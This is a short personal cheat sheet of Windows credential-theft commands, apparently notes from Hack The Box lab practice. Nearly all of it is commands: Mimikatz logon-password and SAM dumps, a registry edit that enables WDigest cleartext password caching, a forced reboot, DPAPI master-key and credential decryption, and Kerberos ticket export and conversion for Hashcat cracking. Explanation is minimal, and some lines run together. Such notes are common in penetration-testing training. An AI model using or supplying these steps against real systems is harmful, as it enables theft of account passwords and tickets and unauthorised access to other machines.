mimikatz
privilege::debugfor the saved logon password
sekurlsa::logonpasswordsIf the password is null
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
- to check
reg query "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
- restart the system
shutdown /r /t 0 /fDPAPI
to get the master key
.\mimikatz.exe "dpapi::masterkey /in:C:\users\ppotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc" exitgetting creds after getting master key
.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\18A1927A997A794B65E9849883AC3F3E /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exitExtracting Tickets from Memory with Mimikatz
Using 'mimikatz.log' for logfile : OK
mimikatz # base64 /out:true
isBase64InterceptInput is false
isBase64InterceptOutput is true
mimikatz # kerberos::list /export Preparing the Base64 Blob for Cracking
AnuragTaparia@htb[/htb]$ echo "<base64 blob>" | tr -d \\n > encoded_filePlacing the Output into a File as .kirbi
AnuragTaparia@htb[/htb]$ cat encoded_file | base64 -d > sqldev.kirbiNext, we can use this version of the kirbi2john.py tool to extract the Kerberos ticket from the TGS file.
Extracting the Kerberos Ticket using kirbi2john.py
AnuragTaparia@htb[/htb]$ python2.7 kirbi2john.py sqldev.kirbiThis will create a file called crack_file. We then must modify the file a bit to be able to use Hashcat against the hash.
Modifying crack_file for Hashcat
AnuragTaparia@htb[/htb]$ sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcatCracking the Hash with Hashcat
AnuragTaparia@htb[/htb]$ hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt Infinite issue
use a non-interactive way
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exitSAM Dump
lsadump::samLast updated